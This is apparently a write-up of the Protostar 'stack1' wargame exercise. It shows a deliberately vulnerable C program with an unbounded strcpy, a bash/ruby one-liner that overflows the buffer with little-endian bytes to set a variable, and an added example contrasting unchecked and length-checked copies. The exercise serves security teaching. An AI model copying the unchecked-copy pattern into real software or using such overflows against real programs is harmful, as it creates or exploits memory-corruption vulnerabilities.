In this second exercise we are asked again to overwrite the variable “modified” in order to get the “good boy” message. This time, though, we have to overwrite it with a specific value: 0x61626364.
    #include <stdlib.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <string.h>
    #include <err.h>   /* errx() */

    int main(int argc, char **argv)
    {
      /* "modified" sits right after "buffer" in the frame */
      volatile int modified;
      char buffer[64];

      if(argc == 1) {
        errx(1, "please specify an argument\n");
      }

      modified = 0;
      /* unbounded copy: the intended flaw of the exercise */
      strcpy(buffer, argv[1]);

      if(modified == 0x61626364) {
        printf("you have correctly got the variable to the right value\n");
      } else {
        printf("Try again, you got 0x%08x\n", modified);
      }
    }
The stack layout is the same as in stack0, so again we need to fill the 64 bytes of “buffer” and then supply the 4 bytes of the hex value.
The point of this exercise is to take endianness into account and overwrite “modified” with the proper byte ordering, so that the value ends up correctly set on the stack. Since the Protostar architecture is i686, we know it is little-endian, so the least significant byte, 0x64, must come first in the input. Easy, isn’t it? :)
Again, we will use bash and ruby to write the solution:
    #!/bin/bash
    ./stack1 $(ruby -e ' puts "A"*64 + "\x64\x63\x62\x61" ')
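The byte-ordering point above, as an added example that is not part of the original exercise or post: it models the frame as a struct (an assumed layout, with `modified` directly after `buffer`), shows what value `modified` ends up with for a little-endian tail versus a plain "abcd" tail, and puts a length-checked copy next to the unbounded one. All function names are hypothetical and the inputs are constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of the stack1 frame (assumed layout): modified right after buffer. */
struct frame { char buffer[64]; uint32_t modified; };

/* Store v least-significant byte first, as an i686 CPU keeps it in memory. */
static void le32_store(uint32_t v, unsigned char out[4]) {
    for (int i = 0; i < 4; i++) out[i] = (unsigned char)(v >> (8 * i));
}

/* Read 4 bytes back as a little-endian integer, whatever the host order. */
static uint32_t le32_load(const unsigned char *p) {
    return p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Unbounded copy as strcpy() does it, modelled over the whole frame.
   Returns what modified holds afterwards, read the way i686 reads it. */
static uint32_t copy_unchecked(const unsigned char *arg, size_t len) {
    struct frame f;
    memset(&f, 0, sizeof f);
    if (len > sizeof f) len = sizeof f;   /* keep the model itself in bounds */
    memcpy(&f, arg, len);
    return le32_load((const unsigned char *)&f.modified);
}

/* Hardened copy: refuse anything that does not fit buffer with its NUL. */
static int copy_checked(struct frame *f, const char *arg) {
    size_t n = strlen(arg);
    if (n >= sizeof f->buffer) return -1;
    memcpy(f->buffer, arg, n + 1);
    return 0;
}

/* 64 filler bytes followed by four tail bytes (constructed sample input). */
static uint32_t modified_after(const unsigned char tail[4]) {
    unsigned char arg[68];
    memset(arg, 'A', 64);
    memcpy(arg + 64, tail, 4);
    return copy_unchecked(arg, sizeof arg);
}

int main(void) {
    unsigned char le[4];
    struct frame f = { {0}, 0 };
    char big[69];
    memset(big, 'A', 68); big[68] = '\0';
    le32_store(0x61626364, le);           /* bytes 64 63 62 61, i.e. "dcba" */
    printf("little-endian tail: 0x%08x\n", (unsigned)modified_after(le));
    printf("\"abcd\" tail: 0x%08x\n", (unsigned)modified_after((const unsigned char *)"abcd"));
    printf("checked copy of 68 bytes returns %d\n", copy_checked(&f, big));
    return 0;
}
```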